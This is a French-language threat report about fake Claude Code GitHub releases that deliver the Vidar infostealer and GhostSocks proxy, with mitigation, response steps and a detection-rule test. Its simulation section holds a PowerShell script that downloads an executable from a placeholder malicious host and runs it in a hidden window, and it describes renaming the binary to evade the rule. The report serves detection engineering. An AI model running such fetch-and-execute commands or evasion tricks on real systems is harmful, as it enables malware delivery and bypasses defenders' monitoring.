Les Leurres Claude Code Transforment les Releases GitHub en un Canal de Livraison de Logiciels Malveillants

Résumé

Les acteurs de la menace ont rapidement tiré parti d’un package npm mal configuré qui a accidentellement exposé le code source Claude d’Anthropic. Ils ont monté de faux dépôts GitHub hébergeant des « versions » 7z truffées de chevaux de Troie, lesquelles déployaient un chargeur construit en Rust. Une fois exécuté, le programme d’installation installe l’infostealer Vidar ainsi que le proxy SOCKS5 GhostSocks pour permettre le vol et un accès furtif.

Enquête

L’enquête a découvert une opération de leurre tournant active depuis février 2026, reposant sur des comptes GitHub de courte durée pour publier des artefacts de version malveillants. À travers le jeu de leurres, les victimes reçoivent le même payload TradeAI.exe, qui déchiffre les URL C2 intégrées, effectue des vérifications anti-analyse et déploie à la fois Vidar et GhostSocks. La découverte des C2 est pilotée par des résolveurs dead-drop hébergés sur Steam et Telegram, aidant la campagne à recycler rapidement l’infrastructure.

Atténuation

Les organisations devraient limiter les installations d’outils IA à des sources vérifiées, bloquer les liens de version GitHub malveillants connus et les domaines C2 associés, et surveiller de près les comportements de vol de données. Ajouter des détections d’endpoint pour les installateurs compilés en Rust et les modèles d’exécution communs à Vidar/GhostSocks. Renforcer la couverture des signaux d’évasion en sandbox et restreindre l’exécution de scripts suspects (y compris l’activité PowerShell anormale) pouvant être utilisée pour la mise en scène ou les actions ultérieures.

Réponse

Si détecté, isolez l’endpoint, conservez l’exécutable malveillant et son archive 7z associée, et traquez les artefacts de Vidar et GhostSocks à travers l’hôte et le réseau. Bloquez les URL pastebin et snippet.host identifiées et révoquez immédiatement les crédentiels exposés. Réalisez une évaluation complète des compromissions de crédentiels, puis réinitialisez les comptes privilégiés et invalidez les jetons/sessions pour empêcher une réutilisation.

Exécution de simulation

Prérequis : La vérification préalable Télémetrie & Baseline doit avoir été réussie.

Rationale : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémetrie exacte attendue par la logique de détection.

• Narratif d’attaque & Commandes :
  Un adversaire reçoit un e-mail d’hameçonnage (T1566.002) contenant un lien malveillant qui pointe vers un dépôt GitHub compromis hébergeant TradeAI.exe. La victime clique sur le lien, ce qui lance PowerShell dans une fenêtre cachée. Le script télécharge le programmes d’installation dans le répertoire temporaire, l’exécute, et le programme d’installation installe ensuite le voleur Vidar et le proxy GhostSocks (T1027, T1090.003).

• Script de test de régression :

   # -------------------------------------------------
    # Simuler l'exécution de TradeAI.exe dropper
    # -------------------------------------------------
    $url = "http://malicious.example.com/TradeAI.exe"
    $outPath = "$env:TEMPTradeAI.exe"
  
    # Télécharger le dropper (imiter le comportement réel de l'attaquant)
    Invoke-WebRequest -Uri $url -OutFile $outPath -UseBasicParsing
  
    # Exécuter le dropper silencieusement
    Start-Process -FilePath $outPath -WindowStyle Hidden
  
    # OPTIONNEL : attendre quelques secondes pour permettre l'apparition de processus secondaires
    Start-Sleep -Seconds 5
    # -------------------------------------------------

• Commandes de nettoyage :

   # Supprimer le dropper téléchargé et les artefacts temporaires
    $outPath = "$env:TEMPTradeAI.exe"
    if (Test-Path $outPath) { Remove-Item $outPath -Force }
  
    # (Si le dropper a créé des fichiers supplémentaires, localisez-les et supprimez-les si nécessaire)
    # Exemple : supprimer le répertoire chargé
    $payloadDir = "$env:APPDATAVidar"
    if (Test-Path $payloadDir) { Remove-Item $payloadDir -Recurse -Force }

Validation & Résultat attendu

1. Alerte SIEM attendue : Après avoir exécuté le script de régression, le SIEM devrait générer une alerte où Image se termine par TradeAI.exe (or ClaudeCode_x64.exe). Le titre de l’alerte correspondra au titre du champ de la règle.
2. Test d’évasion : Renommez le binaire téléchargé en TradeAI_renamed.exe et relancez le script. Aucune alerte ne devrait être déclenchée, confirmant la dépendance de la règle sur les noms de fichiers statiques.

Recommandations de durcissement

1. Ajouter des indicateurs de hachage : Inclure les hachages SHA‑256 des installateurs malveillants connus dans la règle (ou une règle basée sur le hachage séparée).
2. Élargir la portée : Étendre la détection pour surveiller les exécutions de binaires inconnus lancés depuis des emplacements atypiques (ex : %TEMP%, %APPDATA%).
3. Corrélation comportementale : Corréler la création de processus avec les connexions réseau suivantes vers les domaines GhostSocks connus (T1090.003) et les écritures de fichiers de composants Vidar connus.
4. Application sur l’endpoint : Déployer AppLocker ou Windows Defender Application Control pour bloquer l’exécution de binaires non signés à partir de répertoires inscriptibles par l’utilisateur.

Fin du rapport